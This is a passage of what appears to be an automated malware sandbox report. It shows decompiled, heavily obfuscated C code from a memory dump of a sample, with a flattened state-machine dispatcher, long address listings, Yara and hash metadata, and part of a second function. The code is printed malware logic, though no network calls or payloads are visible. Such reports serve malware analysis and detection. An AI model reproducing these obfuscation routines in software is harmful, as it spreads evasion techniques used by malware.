				_v256 = _v256 ^ 0xaf20e1f9;
				_v256 = _v256 + 0xffff3dd2;
				_v256 = _v256 ^ 0xaf0f27e0;
				_v264 = 0x5a208f;
				_v264 = _v264 * 0x52;
				_v264 = _v264 ^ 0x9d084573;
				_v264 = _v264 ^ 0x81d5152e;
				_v168 = 0x69c0de;
				_v168 = _v168 | 0x4bf1e754;
				_v168 = _v168 ^ 0x4bf0828f;
				_v232 = 0x31b0a3;
				_v232 = _v232 | 0xd5494fc2;
				_v232 = _v232 ^ 0x4946f5cc;
				_v232 = _v232 ^ 0x9c324e1f;
				_v384 = 0x31488e;
				_t800 = 0x69;
				_v384 = _v384 * 0xf;
				_t801 = 0x66;
				_v384 = _v384 / _t800;
				_v384 = _v384 + 0xffff35c6;
				_v384 = _v384 ^ 0x000ae164;
				_v240 = 0x63a742;
				_v240 = _v240 + 0x7e1;
				_v240 = _v240 + 0x97bd;
				_v240 = _v240 ^ 0x006ce62a;
				_v228 = 0xd33ddb;
				_v228 = _v228 + 0x4206;
				_v228 = _v228 + 0xad1;
				_v228 = _v228 ^ 0x00d02197;
				_v172 = 0x5b6a97;
				_v172 = _v172 * 0x6f;
				_v172 = _v172 ^ 0x27a557a2;
				_v396 = 0xe0b5e3;
				_v396 = _v396 << 2;
				_v396 = _v396 >> 8;
				_v396 = _v396 + 0x2bd4;
				_v396 = _v396 ^ 0x00086263;
				_v292 = 0xf80f19;
				_v292 = _v292 ^ 0x8502a1e4;
				_v292 = _v292 >> 4;
				_v292 = _v292 ^ 0x085dbbb6;
				_v336 = 0x857240;
				_v336 = _v336 + 0xffffa8de;
				_v336 = _v336 >> 0xb;
				_v336 = _v336 ^ 0x000836d2;
				_v376 = 0xac3a78;
				_v376 = _v376 << 4;
				_v376 = _v376 ^ 0x33e24ce3;
				_v376 = _v376 << 0x10;
				_v376 = _v376 ^ 0xeb65b445;
				_v344 = 0x5c371f;
				_v344 = _v344 >> 0xd;
				_v344 = _v344 | 0xeacfcfde;
				_v344 = _v344 ^ 0xeac9349c;
				_v204 = 0xbf5d95;
				_v204 = _v204 ^ 0xaa3abb38;
				_v204 = _v204 ^ 0xaa8d0089;
				_v224 = 0x296818;
				_v224 = _v224 + 0xffffcd0c;
				_v224 = _v224 << 0xf;
				_v224 = _v224 ^ 0x9a9e0707;
				_v420 = 0x2ce410;
				_v420 = _v420 + 0xffff87c9;
				_v420 = _v420 + 0xffff9f9b;
				_v420 = _v420 + 0x8d8a;
				_v420 = _v420 ^ 0x00236d08;
				_v260 = 0x52ff63;
				_v260 = _v260 << 3;
				_v260 = _v260 + 0xffffd91d;
				_v260 = _v260 ^ 0x029ba434;
				_v208 = 0xb8fe1d;
				_v208 = _v208 >> 8;
				_t802 = 0xe;
				_v208 = _v208 / _t801;
				_v208 = _v208 ^ 0x000a9b9e;
				_v324 = 0x6c1c79;
				_v324 = _v324 ^ 0xb363f955;
				_v324 = _v324 ^ 0x8e9acb62;
				_v324 = _v324 ^ 0x3d993b66;
				_v216 = 0xe9d33f;
				_v216 = _v216 / _t802;
				_v216 = _v216 >> 0xf;
				_v216 = _v216 ^ 0x0000327a;
				_v332 = 0x9f1132;
				_v332 = _v332 * 0x4d;
				_v332 = _v332 + 0xffffcaaa;
				_v332 = _v332 ^ 0x2fde1ae3;
				_v196 = 0xb122c7;
				_v196 = _v196 << 8;
				_v196 = _v196 ^ 0xb124a0ca;
				_v188 = 0xb903fa;
				_v188 = _v188 + 0xffff354e;
				_v188 = _v188 ^ 0x00b9d945;
				_v140 = 0x44fc40;
				_v140 = _v140 + 0xd4d;
				_v140 = _v140 ^ 0x0049b242;
				_v308 = 0xf6165e;
				_v308 = _v308 | 0x71aa2658;
				_v308 = _v308 * 0x6b;
				_v308 = _v308 ^ 0xa54f1364;
				_v180 = 0x4d5695;
				_v180 = _v180 ^ 0x6e37bae2;
				_v180 = _v180 ^ 0x6e77cc18;
				_v220 = 0x12bce5;
				_v220 = _v220 ^ 0xee96e214;
				_v220 = _v220 ^ 0x41031b17;
				_v220 = _v220 ^ 0xaf80e24c;
				_v124 = 0x78b997;
				_v124 = _v124 ^ 0x3f24504b;
				_v124 = _v124 ^ 0x3f554dd0;
				_v412 = 0x15645e;
				_v412 = _v412 >> 2;
				_v412 = _v412 | 0x19a57d1e;
				_v412 = _v412 << 2;
				_v412 = _v412 ^ 0x669f8c64;
				_v268 = 0x51234f;
				_v268 = _v268 + 0x36e7;
				_v268 = _v268 * 0x28;
				_v268 = _v268 ^ 0x0cb0ba42;
				_v144 = 0x8ef1eb;
				_v144 = _v144 + 0xd9b4;
				_v144 = _v144 ^ 0x008a4224;
				_v212 = 0xa5d17b;
				_v212 = _v212 << 4;
				_v212 = _v212 ^ 0xd39094ce;
				_v212 = _v212 ^ 0xd9c4358e;
				_v136 = 0x5dab53;
				_v136 = _v136 ^ 0xb3b675ea;
				_v136 = _v136 ^ 0xb3ef4e4d;
				_v164 = 0xa2d424;
				_v164 = _v164 + 0xd184;
				_v164 = _v164 ^ 0x00a6948b;
				_v320 = 0x46a4a2;
				_v320 = _v320 >> 0xb;
				_v320 = _v320 ^ 0xed63e9e3;
				_v320 = _v320 ^ 0xed6e6ace;
				_v236 = 0x5cdda7;
				_v236 = _v236 + 0xa167;
				_v236 = _v236 + 0xffff89e9;
				_v236 = _v236 ^ 0x00505320;
				_v424 = 0x7dc028;
				_v424 = _v424 | 0xc802eae8;
				_v424 = _v424 >> 4;
				_v424 = _v424 | 0x1c9bbcfa;
				_v424 = _v424 ^ 0x1c9a546c;
				_v304 = 0xe00dbe;
				_v304 = _v304 + 0xffff7894;
				_v304 = _v304 | 0x1518f723;
				_v304 = _v304 ^ 0x15de424d;
				_v156 = 0xcaf152;
				_v156 = _v156 * 0x17;
				_v156 = _v156 ^ 0x12317468;
				_v400 = 0x702312;
				_v400 = _v400 + 0xffff8a08;
				_t803 = 0x29;
				_v400 = _v400 / _t803;
				_v400 = _v400 ^ 0x8aedd9ac;
				_v400 = _v400 ^ 0x8ae99a2e;
				_v348 = 0xfd00be;
				_v348 = _v348 ^ 0x254b20e2;
				_v348 = _v348 + 0xffff4fd4;
				_v348 = _v348 ^ 0x25bcd5e4;
				_v340 = 0x15057b;
				_v340 = _v340 + 0xffff3cfe;
				_v340 = _v340 ^ 0xf2bf9676;
				_v340 = _v340 ^ 0xf2a06c3f;
				_v388 = 0xf80b42;
				_v388 = _v388 | 0x6e0aefd1;
				_v388 = _v388 >> 0xd;
				_v388 = _v388 ^ 0x56e72cd3;
				_v388 = _v388 ^ 0x56e22de1;
				_v428 = 0xf44d53;
				_v428 = _v428 >> 8;
				_v428 = _v428 >> 5;
				_v428 = _v428 | 0x0c86e395;
				_v428 = _v428 ^ 0x0c85f464;
				_v252 = 0xa11dfc;
				_v252 = _v252 >> 5;
				_v252 = _v252 + 0x2f65;
				_v252 = _v252 ^ 0x000663de;
				_v364 = 0x3fd805;
				_v364 = _v364 + 0xffff75e6;
				_v364 = _v364 + 0xffff88df;
				_v364 = _v364 | 0x6edac8cb;
				_v364 = _v364 ^ 0x6effa0a8;
				_v132 = 0x1ff9d9;
				_v132 = _v132 << 0xf;
				_v132 = _v132 ^ 0xfcedd5a3;
				_v404 = 0x40578a;
				_t804 = 0x1a;
				_v404 = _v404 * 0x2b;
				_v404 = _v404 >> 0xb;
				_v404 = _v404 | 0xf7d711dc;
				_v404 = _v404 ^ 0xf7ddf608;
				_v380 = 0x99a7f5;
				_v380 = _v380 * 0x17;
				_v380 = _v380 >> 0xa;
				_v380 = _v380 + 0xffff02e7;
				_v380 = _v380 ^ 0x00028ade;
				_v300 = 0xa5bd5a;
				_v300 = _v300 ^ 0x487cada1;
				_v300 = _v300 / _t804;
				_v300 = _v300 ^ 0x02cd6e95;
				_v276 = 0x109f58;
				_v276 = _v276 + 0xffff6b97;
				_v276 = _v276 | 0x8ed672c3;
				_v276 = _v276 ^ 0x8ed38b05;
				_v432 = 0x269f3d;
				_v432 = _v432 << 7;
				_v432 = _v432 >> 0xd;
				_v432 = _v432 >> 7;
				_v432 = _v432 ^ 0x00051bd1;
				_v372 = 0x954f50;
				_v372 = _v372 / _t891;
				_v372 = _v372 >> 1;
				_v372 = _v372 ^ 0xc9264516;
				_v372 = _v372 ^ 0xc925eff0;
				_v328 = 0x78b98e;
				_v328 = _v328 | 0x1d96f0ac;
				_v328 = _v328 * 0x54;
				_v328 = _v328 ^ 0xd7a7266b;
				_v152 = 0xa4a604;
				_v152 = _v152 + 0x2678;
				_v152 = _v152 ^ 0x00a06680;
				_t892 = 0x5467895;
				_v360 = 0xb67e06;
				_t888 = 0xdca4c76;
				_v360 = _v360 + 0xfffffb89;
				_v360 = _v360 + 0xd3dd;
				_v360 = _v360 + 0xffff2e0b;
				_v360 = _v360 ^ 0x00bb2c33;
				while(1) {
					L1:
					_t805 = 0xc44443f;
					while(1) {
						L2:
						_t756 = 0xb2c3b3d;
						_t867 = 0xa0c1eae;
						do {
							while(1) {
								L3:
								_t902 = _t788 - _t756;
								if(_t902 > 0) {
									break;
								}
								if(_t902 == 0) {
									_v104 = 0x100;
									_t775 = E01222D1D(_v284, _v228, 0x100,  &_v116, _v172, _v396, _v112, _v292);
									_t897 = _t897 + 0x18;
									__eflags = _t775 - _v244;
									_t805 = 0xc44443f;
									_t788 =  ==  ? 0xc44443f : 0xfbf5f53;
									goto L2;
								} else {
									if(_t788 == 0xdb0117) {
										E0122B1A5(_v252, _v364, _v100, _v132);
										_t788 = 0x83c26da;
										while(1) {
											L1:
											_t805 = 0xc44443f;
											goto L2;
										}
									} else {
										if(_t788 == _t892) {
											_t777 = E0122EDED(_v100);
											_t788 = 0xdb0117;
											__eflags = _t777;
											_t896 =  !=  ? 1 : _t896;
											while(1) {
												L1:
												_t805 = 0xc44443f;
												goto L2;
											}
										} else {
											if(_t788 == 0x6b38845) {
												_t788 = 0xce9f3c5;
												continue;
											} else {
												if(_t788 == 0x83c26da) {
													E01232D18(_v404, _v380, _v300, _v108);
													_t788 = _t888;
													while(1) {
														L1:
														_t805 = 0xc44443f;
														goto L2;
													}
												} else {
													if(_t788 == 0x9c5cad5) {
														_push(_v420);
														_push(_v224);
														_t779 = E0122CD35(0x12112a0, _v204, __eflags);
														_t893 = _t779;
														_t780 = 0x48;
														_v104 = _t780;
														_t783 = E0122DAC1(_v116, _v260, _v316,  &_v104, _v208, _v324, _v216, _v332, _v196,  &_v76, _t779, _t780);
														_t899 = _t897 + 0x34;
														__eflags = _t783 - _v356;
														if(_t783 != _v356) {
															_t788 = _t888;
														} else {
															E01232C81(_v188,  &_v68, _v140,  *0x1235220, _v308, 0x40);
															_t899 = _t899 + 0x10;
															_t788 = 0xd6124b9;
														}
														E0122629F(_v180, _t893, _v220, _v124, _v412);
														L16:
														_t897 = _t899 + 0xc;
														L17:
														_t892 = 0x5467895;
														L36:
														_t867 = 0xa0c1eae;
														_t805 = 0xc44443f;
														_t756 = 0xb2c3b3d;
														goto L37;
													} else {
														if(_t788 != _t867) {
															goto L37;
														} else {
															_t614 =  &_v116; // 0x6a655a
															E01217460(_v340, _v108,  &_v100, _v312,  *_t614, _v388, _v428);
															_t897 = _t897 + 0x14;
															_t788 =  ==  ? _t892 : 0x83c26da;
															while(1) {
																L1:
																_t805 = 0xc44443f;
																L2:
																_t756 = 0xb2c3b3d;
																_t867 = 0xa0c1eae;
																goto L3;
															}
														}
													}
												}
											}
										}
									}
								}
								L29:
								return _t896;
							}
							__eflags = _t788 - _t805;
							if(_t788 == _t805) {
								_t709 =  &_v116; // 0x6a655a
								_t757 = E01223C24(_v336, _v376,  *_t709, _v160, _v344);
								_t897 = _t897 + 0xc;
								__eflags = _t757 - _v368;
								if(__eflags != 0) {
									_t788 = _t888;
									goto L36;
								} else {
									_t788 = 0x9c5cad5;
									goto L1;
								}
							} else {
								__eflags = _t788 - 0xce9f3c5;
								if(__eflags == 0) {
									_push(_v296);
									_push(_v128);
									_t759 = E0122CD35(0x1211360, _v288, __eflags);
									_push(_v148);
									_push(_v280);
									__eflags = E0122D96C(_v184, _v192,  &_v112, _v200, _v272, E0122CD35(0x1211250, _v120, __eflags), _t759) - _v392;
									_t788 =  ==  ? 0xb2c3b3d : 0x2504c9b;
									E0122629F(_v248, _t759, _v176, _v256, _v264);
									_t899 = _t897 + 0x30;
									E0122629F(_v168, _t760, _v232, _v384, _v240);
									_t888 = 0xdca4c76;
									goto L16;
								} else {
									__eflags = _t788 - 0xd6124b9;
									if(__eflags == 0) {
										_push(_v212);
										_push(_v144);
										_t766 = E0122CD35(0x12112a0, _v268, __eflags);
										_pop(_t831);
										_t671 =  &_v108; // 0x6a655a
										__eflags = E01229F1C(_v136,  *_v96, _t831,  *((intOrPtr*)(_v96 + 4)), _v164, _v112, _v416, _v320, _t766, _v236, _v424, _t671) - _v408;
										_t684 =  &_v156; // 0x6a655a
										_t788 =  ==  ? 0xa0c1eae : _t888;
										E0122629F(_v304, _t766,  *_t684, _v400, _v348);
										_t897 = _t897 + 0x34;
										goto L17;
									} else {
										__eflags = _t788 - _t888;
										if(_t788 == _t888) {
											E01232D18(_v276, _v432, _v372, _v116);
											_t788 = 0xfbf5f53;
											while(1) {
												L1:
												_t805 = 0xc44443f;
												goto L2;
											}
										} else {
											__eflags = _t788 - 0xfbf5f53;
											if(_t788 != 0xfbf5f53) {
												goto L37;
											} else {
												E01224827(_v112, _v328, _v352, _v152, _v360);
											}
										}
									}
								}
							}
							goto L29;
							L37:
							__eflags = _t788 - 0x2504c9b;
						} while (__eflags != 0);
						goto L29;
					}
				}
			}




























































































































                          0x0122744b
                          0x01227463
                          0x0122746a
                          0x0122746f
                          0x01227472
                          0x01227473
                          0x01227475
                          0x01227478
                          0x0122747d
                          0x0122747e
                          0x01227489
                          0x01227494
                          0x0122749f
                          0x012274a7
                          0x012274ac
                          0x012274bc
                          0x012274c0
                          0x012274c8
                          0x012274d3
                          0x012274db
                          0x012274e6
                          0x012274f1
                          0x01227507
                          0x0122750e
                          0x01227516
                          0x0122751d
                          0x01227528
                          0x0122752f
                          0x01227534
                          0x0122753d
                          0x01227548
                          0x01227554
                          0x01227559
                          0x0122755f
                          0x01227567
                          0x0122756a
                          0x0122756e
                          0x01227576
                          0x01227581
                          0x0122758c
                          0x01227597
                          0x012275a2
                          0x012275aa
                          0x012275af
                          0x012275b7
                          0x012275bf
                          0x012275c7
                          0x012275cf
                          0x012275d7
                          0x012275df
                          0x012275e7
                          0x012275ef
                          0x012275f7
                          0x012275ff
                          0x01227607
                          0x0122760c
                          0x01227614
                          0x01227621
                          0x0122762c
                          0x01227637
                          0x01227642
                          0x0122764a
                          0x01227652
                          0x0122765a
                          0x01227662
                          0x0122766a
                          0x01227675
                          0x0122768a
                          0x0122768d
                          0x01227694
                          0x0122769f
                          0x012276aa
                          0x012276b5
                          0x012276c0
                          0x012276d3
                          0x012276da
                          0x012276e5
                          0x012276f0
                          0x012276fb
                          0x01227703
                          0x0122770a
                          0x01227715
                          0x0122772b
                          0x0122773a
                          0x0122773d
                          0x01227744
                          0x0122774f
                          0x0122775a
                          0x01227762
                          0x0122776d
                          0x01227778
                          0x01227783
                          0x0122778e
                          0x012277a4
                          0x012277ab
                          0x012277b6
                          0x012277c1
                          0x012277cc
                          0x012277d7
                          0x012277e2
                          0x012277ed
                          0x01227800
                          0x01227801
                          0x01227808
                          0x01227813
                          0x01227827
                          0x0122782e
                          0x01227839
                          0x01227844
                          0x0122784f
                          0x0122785a
                          0x01227865
                          0x01227878
                          0x0122787f
                          0x0122788a
                          0x01227895
                          0x012278a0
                          0x012278ab
                          0x012278b6
                          0x012278c1
                          0x012278cc
                          0x012278d9
                          0x012278e4
                          0x012278f3
                          0x012278f6
                          0x01227900
                          0x01227901
                          0x01227907
                          0x0122790f
                          0x01227917
                          0x01227922
                          0x0122792d
                          0x01227938
                          0x01227943
                          0x0122794e
                          0x01227959
                          0x01227964
                          0x0122796f
                          0x01227984
                          0x0122798b
                          0x01227996
                          0x0122799e
                          0x012279a3
                          0x012279a8
                          0x012279b0
                          0x012279b8
                          0x012279c3
                          0x012279ce
                          0x012279d6
                          0x012279e1
                          0x012279e9
                          0x012279f1
                          0x012279f6
                          0x012279fe
                          0x01227a06
                          0x01227a0b
                          0x01227a13
                          0x01227a18
                          0x01227a20
                          0x01227a28
                          0x01227a2d
                          0x01227a35
                          0x01227a3d
                          0x01227a48
                          0x01227a53
                          0x01227a5e
                          0x01227a69
                          0x01227a74
                          0x01227a7c
                          0x01227a87
                          0x01227a8f
                          0x01227a97
                          0x01227a9f
                          0x01227aa7
                          0x01227aaf
                          0x01227aba
                          0x01227ac2
                          0x01227acd
                          0x01227ad8
                          0x01227ae3
                          0x01227af4
                          0x01227af5
                          0x01227afc
                          0x01227b07
                          0x01227b12
                          0x01227b1d
                          0x01227b28
                          0x01227b35
                          0x01227b49
                          0x01227b50
                          0x01227b58
                          0x01227b63
                          0x01227b70
                          0x01227b74
                          0x01227b7c
                          0x01227b84
                          0x01227b8f
                          0x01227b97
                          0x01227ba2
                          0x01227bad
                          0x01227bb8
                          0x01227bc3
                          0x01227bce
                          0x01227bd9
                          0x01227be4
                          0x01227bef
                          0x01227c02
                          0x01227c09
                          0x01227c14
                          0x01227c1f
                          0x01227c2a
                          0x01227c35
                          0x01227c40
                          0x01227c4b
                          0x01227c56
                          0x01227c61
                          0x01227c6c
                          0x01227c77
                          0x01227c82
                          0x01227c8a
                          0x01227c8f
                          0x01227c97
                          0x01227c9c
                          0x01227ca4
                          0x01227caf
                          0x01227cc2
                          0x01227cc9
                          0x01227cd4
                          0x01227cdf
                          0x01227cea
                          0x01227cf5
                          0x01227d00
                          0x01227d08
                          0x01227d13
                          0x01227d1e
                          0x01227d29
                          0x01227d34
                          0x01227d3f
                          0x01227d4a
                          0x01227d55
                          0x01227d60
                          0x01227d6b
                          0x01227d73
                          0x01227d7e
                          0x01227d89
                          0x01227d94
                          0x01227d9f
                          0x01227daa
                          0x01227db5
                          0x01227dbd
                          0x01227dc5
                          0x01227dca
                          0x01227dd2
                          0x01227dda
                          0x01227de5
                          0x01227df0
                          0x01227dfb
                          0x01227e06
                          0x01227e19
                          0x01227e20
                          0x01227e2b
                          0x01227e33
                          0x01227e43
                          0x01227e48
                          0x01227e4c
                          0x01227e54
                          0x01227e5c
                          0x01227e64
                          0x01227e6c
                          0x01227e74
                          0x01227e7c
                          0x01227e84
                          0x01227e8c
                          0x01227e94
                          0x01227e9c
                          0x01227ea4
                          0x01227eac
                          0x01227eb1
                          0x01227eb9
                          0x01227ec1
                          0x01227ec9
                          0x01227ece
                          0x01227ed3
                          0x01227edb
                          0x01227ee3
                          0x01227eee
                          0x01227ef6
                          0x01227f01
                          0x01227f0c
                          0x01227f14
                          0x01227f1c
                          0x01227f24
                          0x01227f2c
                          0x01227f34
                          0x01227f3f
                          0x01227f47
                          0x01227f52
                          0x01227f61
                          0x01227f62
                          0x01227f66
                          0x01227f6b
                          0x01227f73
                          0x01227f7b
                          0x01227f88
                          0x01227f8c
                          0x01227f91
                          0x01227f99
                          0x01227fa1
                          0x01227fac
                          0x01227fc2
                          0x01227fc9
                          0x01227fd4
                          0x01227fdf
                          0x01227fea
                          0x01227ff5
                          0x01228000
                          0x01228008
                          0x0122800d
                          0x01228012
                          0x01228017
                          0x0122801f
                          0x0122802d
                          0x01228031
                          0x01228035
                          0x0122803d
                          0x01228045
                          0x0122804d
                          0x0122805a
                          0x0122805e
                          0x01228066
                          0x01228071
                          0x0122807c
                          0x01228087
                          0x0122808c
                          0x01228094
                          0x01228099
                          0x012280a1
                          0x012280a9
                          0x012280b1
                          0x012280b9
                          0x012280b9
                          0x012280b9
                          0x012280be
                          0x012280be
                          0x012280be
                          0x012280c3
                          0x012280c8
                          0x012280c8
                          0x012280c8
                          0x012280c8
                          0x012280ca
                          0x00000000
                          0x00000000
                          0x012280d0
                          0x012282c7
                          0x012282e9
                          0x012282f5
                          0x012282f8
                          0x012282ff
                          0x01228304
                          0x00000000
                          0x012280d6
                          0x012280dc
                          0x0122829c
                          0x012282a3
                          0x012280b9
                          0x012280b9
                          0x012280b9
                          0x00000000
                          0x012280b9
                          0x012280e2
                          0x012280e4
                          0x0122826c
                          0x01228273
                          0x01228279
                          0x0122827b
                          0x012280b9
                          0x012280b9
                          0x012280b9
                          0x00000000
                          0x012280b9
                          0x012280ea
                          0x012280f0
                          0x0122825b
                          0x00000000
                          0x012280f6
                          0x012280fc
                          0x0122824d
                          0x01228254
                          0x012280b9
                          0x012280b9
                          0x012280b9
                          0x00000000
                          0x012280b9
                          0x01228102
                          0x01228108
                          0x01228155
                          0x0122815e
                          0x0122816c
                          0x01228173
                          0x01228175
                          0x01228178
                          0x012281c7
                          0x012281cc
                          0x012281cf
                          0x012281d3
                          0x01228208
                          0x012281d5
                          0x012281f9
                          0x012281fe
                          0x01228201
                          0x01228201
                          0x01228225
                          0x0122822a
                          0x0122822a
                          0x0122822d
                          0x0122822d
                          0x0122853c
                          0x0122853c
                          0x01228541
                          0x01228546
                          0x00000000
                          0x0122810a
                          0x0122810c
                          0x00000000
                          0x01228112
                          0x01228121
                          0x0122813e
                          0x01228143
                          0x0122814d
                          0x012280b9
                          0x012280b9
                          0x012280b9
                          0x012280be
                          0x012280be
                          0x012280c3
                          0x00000000
                          0x012280c3
                          0x012280b9
                          0x0122810c
                          0x01228108
                          0x012280fc
                          0x012280f0
                          0x012280e4
                          0x012280dc
                          0x0122835f
                          0x01228369
                          0x01228369
                          0x0122830c
                          0x0122830e
                          0x01228514
                          0x01228522
                          0x01228527
                          0x0122852a
                          0x0122852e
                          0x0122853a
                          0x00000000
                          0x01228530
                          0x01228530
                          0x00000000
                          0x01228530
                          0x01228314
                          0x01228314
                          0x0122831a
                          0x01228432
                          0x0122843e
                          0x0122844c
                          0x01228451
                          0x0122845f
                          0x012284a6
                          0x012284b4
                          0x012284d3
                          0x012284d8
                          0x012284f6
                          0x012284fb
                          0x00000000
                          0x01228320
                          0x01228320
                          0x01228326
                          0x01228391
                          0x0122839d
                          0x012283ab
                          0x012283b1
                          0x012283b4
                          0x01228407
                          0x01228414
                          0x01228422
                          0x01228425
                          0x0122842a
                          0x00000000
                          0x01228328
                          0x01228328
                          0x0122832a
                          0x01228380
                          0x01228387
                          0x012280b9
                          0x012280b9
                          0x012280b9
                          0x00000000
                          0x012280b9
                          0x0122832c
                          0x0122832c
                          0x01228332
                          0x00000000
                          0x01228338
                          0x01228355
                          0x0122835a
                          0x01228332
                          0x0122832a
                          0x01228326
                          0x0122831a
                          0x00000000
                          0x0122854b
                          0x0122854b
                          0x0122854b
                          0x00000000
                          0x01228557
                          0x012280be

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: SP$*l$:K$KP$?$M$O#Q$Qx~$Zej$d$e/$f9($p<$x&$z2$|L$ K%$-V$6$L3$u$c
                          • API String ID: 0-4041043011
                          • Opcode ID: 25f5f34d6fe8ef6fa259a379bbaa91a3addb8ec5f8a626e166f1e633a14ac18f
                          • Instruction ID: aabc73b0527eb5385a0e42b8e5fff1b76ce344c76c1b21e7e7e5471cd33a7a22
                          • Opcode Fuzzy Hash: 25f5f34d6fe8ef6fa259a379bbaa91a3addb8ec5f8a626e166f1e633a14ac18f
                          • Instruction Fuzzy Hash: F982F0715093819BD3B9CF64C48AB8FBBE2FBD4304F10891DE68A96260DBB58559CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23D530, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445memoryCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 81%
                          			E6F23D530(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				long _v40;
				void* _v44;
				void* _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long* _v76;
				signed int _v80;
				signed int _v1096;
				long _v1100;
				void* _v1104;
				void* __ebp;
				void* _t142;
				void* _t143;
				void* _t148;
				signed int _t149;
				intOrPtr _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t160;
				void** _t161;
				void* _t167;
				long _t171;
				signed int _t172;
				long _t173;
				void* _t179;
				void* _t181;
				long _t194;
				signed int _t195;
				signed char _t196;
				signed int _t199;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				void* _t218;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr* _t224;
				intOrPtr _t226;
				signed int _t228;
				char* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				WCHAR* _t247;
				long _t248;
				signed int _t249;
				signed int _t252;
				char* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				signed char* _t273;
				signed int _t274;
				void* _t280;
				intOrPtr _t281;

				_t262 = __esi;
				_t245 = __edi;
				_t192 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t281 = _t280 - 0x440;
				_v32 = _t281;
				_v20 = 0xffffffff;
				_v24 = E6F243B80;
				_v76 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t142 =  *0x6f28adc8; // 0x1310000
				if(_t142 != 0) {
					L3:
					_t143 = HeapAlloc(_t142, 0, 0xa);
					if(_t143 == 0) {
						goto L94;
					} else {
						_t264 = "UST_BACKTRACE";
						_t241 = 1;
						_t211 = 0;
						 *_t143 = 0x52;
						_v1104 = _t143;
						_v1100 = 5;
						_v1096 = 1;
						_v44 = 0;
						while(1) {
							_v36 = _t211;
							if(_t211 == 0) {
								goto L10;
							}
							_v44 = 0;
							_t211 = 0;
							if(_t241 != _v1100) {
								L6:
								_t245 = _v36;
								 *((short*)(_t143 + _t241 * 2)) = _v36;
								_t241 = _t241 + 1;
								_v1096 = _t241;
								continue;
							} else {
								L13:
								_v40 = _t264;
								_v20 = 0;
								_v48 = _t241;
								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
								asm("sbb eax, 0x0");
								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
								E6F257370( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
								_t281 = _t281 + 4;
								_t143 = _v1104;
								_t241 = _v48;
								_t264 = _v40;
								_t211 = _v44;
								goto L6;
							}
							L10:
							__eflags = _t264 - 0x6f27d2be;
							if(_t264 != 0x6f27d2be) {
								_t196 =  *_t264 & 0x000000ff;
								_t229 =  &(_t264[1]);
								_t249 = _t196 & 0x000000ff;
								__eflags = _t196;
								if(_t196 < 0) {
									_v36 = _t249 & 0x0000001f;
									__eflags = _t229 - 0x6f27d2be;
									if(_t229 == 0x6f27d2be) {
										_t230 = 0;
										__eflags = _t196 - 0xdf;
										_t252 = 0;
										_v40 = 0x6f27d2be;
										if(_t196 > 0xdf) {
											goto L25;
										} else {
											_v36 = _v36 << 6;
											_t264 = 0x6f27d2be;
											_t211 = 0;
											__eflags = _t241 - _v1100;
											if(_t241 != _v1100) {
												goto L6;
											} else {
												goto L13;
											}
										}
									} else {
										_t238 = _t264[1] & 0x000000ff;
										_t264 =  &(_t264[2]);
										_t230 = _t238 & 0x0000003f;
										__eflags = _t196 - 0xdf;
										if(_t196 <= 0xdf) {
											_t199 = _v36 << 0x00000006 | _t230;
											__eflags = _t199 - 0xffff;
											if(_t199 > 0xffff) {
												goto L32;
											} else {
												goto L22;
											}
										} else {
											__eflags = _t264 - 0x6f27d2be;
											if(_t264 == 0x6f27d2be) {
												_t252 = 0;
												__eflags = 0;
												_v40 = 0x6f27d2be;
											} else {
												_v40 =  &(_t264[1]);
												_t252 =  *_t264 & 0x3f;
											}
											L25:
											_t232 = _t230 << 0x00000006 | _t252;
											__eflags = _t196 - 0xf0;
											if(_t196 < 0xf0) {
												_t199 = _v36 << 0x0000000c | _t232;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 > 0xffff) {
													goto L32;
												} else {
													goto L22;
												}
											} else {
												_t273 = _v40;
												__eflags = _t273 - 0x6f27d2be;
												if(_t273 == 0x6f27d2be) {
													_t274 = 0;
													__eflags = 0;
													_v40 = 0x6f27d2be;
												} else {
													_v40 =  &(_t273[1]);
													_t274 =  *_t273 & 0x3f;
												}
												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 <= 0xffff) {
													L22:
													_v36 = _t199;
													_t211 = 0;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												} else {
													L32:
													_t200 = _t199 + 0xffff0000;
													_v40 = _t264;
													_v36 = _t200 >> 0x0000000a | 0x0000d800;
													_t264 = _v40;
													_t211 = _t200 & 0x000003ff | 0x0000dc00;
													_v44 = _t211;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								} else {
									_t264 = _t229;
									_v36 = _t249;
									_t211 = 0;
									__eflags = _t241 - _v1100;
									if(_t241 != _v1100) {
										goto L6;
									} else {
										goto L13;
									}
								}
								goto L96;
							}
							_t242 = _v1096;
							asm("movsd xmm0, [ebp-0x44c]");
							_v64 = _t242;
							asm("movsd [ebp-0x44], xmm0");
							__eflags = _t242 - 8;
